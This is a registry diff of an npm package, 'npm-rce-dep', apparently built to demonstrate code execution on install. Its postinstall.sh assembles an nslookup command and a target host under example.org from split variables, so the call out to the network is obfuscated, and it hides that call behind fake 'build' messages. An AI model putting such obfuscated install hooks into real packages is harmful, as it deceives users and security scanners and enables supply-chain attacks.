@programmeramera/npm-rce-dep 1.0.2 → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/output.txt +5 -0
- package/package.json +3 -2
- package/postinstall.sh +3 -3
- package/src/index.js +0 -7
- package/src/index.js.map +0 -1
package/output.txt
ADDED
package/package.json
CHANGED
@@ -1,12 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "@programmeramera/npm-rce-dep",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.4",
|
4
4
|
"description": "",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"build": "npx tsc",
|
8
|
-
"postinstall": "sh postinstall.sh"
|
8
|
+
"postinstall": "sh ./postinstall.sh"
|
9
9
|
},
|
10
|
+
|
10
11
|
"keywords": [],
|
11
12
|
"author": "Johan Lindfors // programmeramera",
|
12
13
|
"license": "ISC",
|
package/postinstall.sh
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
#!/usr/bin/env sh
|
2
2
|
|
3
|
-
echo
|
3
|
+
echo "Starting build..."
|
4
4
|
amount=ample
|
5
5
|
former=ex
|
6
6
|
organization=org
|
7
7
|
install_a=nslo
|
8
8
|
install_b=okup
|
9
9
|
|
10
|
-
$install_a$install_b npm-rce.programmeramera.$former$amount.$organization
|
10
|
+
$install_a$install_b npm-rce.programmeramera.$former$amount.$organization > output.txt
|
11
11
|
|
12
|
-
echo
|
12
|
+
echo "Build succeeded..."
|
package/src/index.js
DELETED
package/src/index.js.map
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
{"version":3,"file":"index.js","sourceRoot":"","sources":["index.ts"],"names":[],"mappings":";;AAAA,4BAEC;AAFD,SAAgB,QAAQ,CAAC,CAAQ,EAAE,CAAQ;IACvC,OAAO,CAAC,GAAG,CAAC,CAAC;AACjB,CAAC"}
|